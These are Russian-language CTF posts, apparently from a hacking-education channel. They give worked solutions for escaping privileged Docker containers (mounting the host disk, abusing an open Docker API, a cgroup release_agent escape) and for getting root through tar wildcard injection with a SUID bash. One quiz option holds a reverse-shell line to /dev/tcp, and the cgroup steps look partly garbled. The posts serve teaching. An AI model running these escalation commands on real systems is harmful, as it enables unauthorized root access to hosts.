🔓 Разбор задачи

Правильный ответ: ВСЕ ТРИ работают, но с нюансами!

➡️ Mount host disk

Почему работает:

Флаг --privileged отключает изоляцию устройств. Контейнер видит все диски хоста.

Эксплойт:

Шаг 1: Смотрим доступные диски
fdisk -l

Видим /dev/sda1 (корень хоста)

Шаг 2: Монтируем
mkdir /mnt/host
mount /dev/sda1 /mnt/host

Шаг 3: Профит!
cat /mnt/host/root/flag.txt

🟢 Плюсы: элементарно, 3 команды
🔴 Минусы: оставляет следы в логах монтирования

➡️ Docker API abuse

Почему работает:
Если DOCKER_HOST открыт без TLS, можем создавать контейнеры от имени хоста.

Эксплойт:

Проверяем доступ к API
curl http://172.17.0.1:2375/version

Запускаем новый контейнер с volume хоста
docker -H tcp://172.17.0.1:2375 run -v /:/host \
  -it alpine chroot /host sh

Теперь мы root на хосте!
cat /root/flag.txt

🟢 Плюсы: полный root-доступ, можем делать всё

🔴 Минусы: нужен Docker CLI в контейнере (не всегда есть)

➡️ Cgroup escape (КЛАССИКА)

Почему работает:
Privileged-контейнер может писать в cgroup notify_on_release и выполнить код на хосте.

Эксплойт:

Создаём cgroup
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp
cd /tmp/cgrp

Включаем notify_on_release
echo 1 > cgroup.procs
echo 1 > notify_on_release

Пишем скрипт, который выполнится на хосте
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > release_agent

Создаём команду
cat /root/flag.txt > /output

🟢 Плюсы: работает даже без явных устройств
🔴 Минусы: сложнее, требует понимания cgroups

💬 Какой способ использовали бы вы?

🐸 Библиотека хакера

#ctf_challenge

🐧 Wildcard Injection Challenge

Сценарий: shell от www-data, sudo нет, SUID чистые.

Нашли cron:

* * * * * root cd /var/www/html && tar -czf /backups/site.tar.gz *

Права:

drwxrwxrwx 2 www-data www-data /var/www/html
-rwxr-xr-x 1 root root /opt/scripts/backup.sh

Цель: root shell через wildcard injection

❓ Какой payload положите в /var/www/html/:

🔥

echo "cp /bin/bash /tmp/r; chmod +s /tmp/r" > x.sh
chmod +x x.sh
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=/bin/sh x.sh»

👾

ln -s /etc/shadow shadow.txt
tar -czf exploit.tar.gz shadow.txt

❤️

echo '* * * * * root bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' > /etc/cron.d/rev

🤩

chmod 777 /opt/scripts/backup.sh
echo "cp /bin/bash /tmp/r && chmod +s /tmp/r" > /opt/scripts/backup.sh

Подсказка: tar * раскроет имена файлов в аргументы. После срабатывания: /tmp/r -p → root.

🐸 Библиотека хакера

#ctf_challenge

🔓 Разбор задачи

В cron у root:

* * * * * root cd /var/www/html && tar -czf /backups/site.tar.gz *

Каталог доступен для записи www-data (777).
Команда tar * раскрывает имена файлов как аргументы. Если подложить файлы, имитирующие флаги, tar воспримет их как реальные параметры и выполнит произвольную команду от root.

🎯 Цель: получить root через SUID bash

Payload, который нужно поместить в /var/www/html:

echo "cp /bin/bash /tmp/r; chmod +s /tmp/r" > x.sh
chmod +x x.sh

touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=/bin/sh x.sh"

--checkpoint заставит tar выполнить x.sh в процессе архивации.
Скрипт создаёт /tmp/r — копию bash с SUID-битом.

После срабатывания cron:

/tmp/r -p

Вы получаете root.

➕ Побочные варианты из задачи не подходят:
запись в cron.d недоступна, shadow в архив ничего не даёт, backup.sh не перезаписать.

Правильный ответ: 🔥

🔹 Курс «Программирование на языке Python»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib

🐸 Библиотека хакера

#ctf_challenge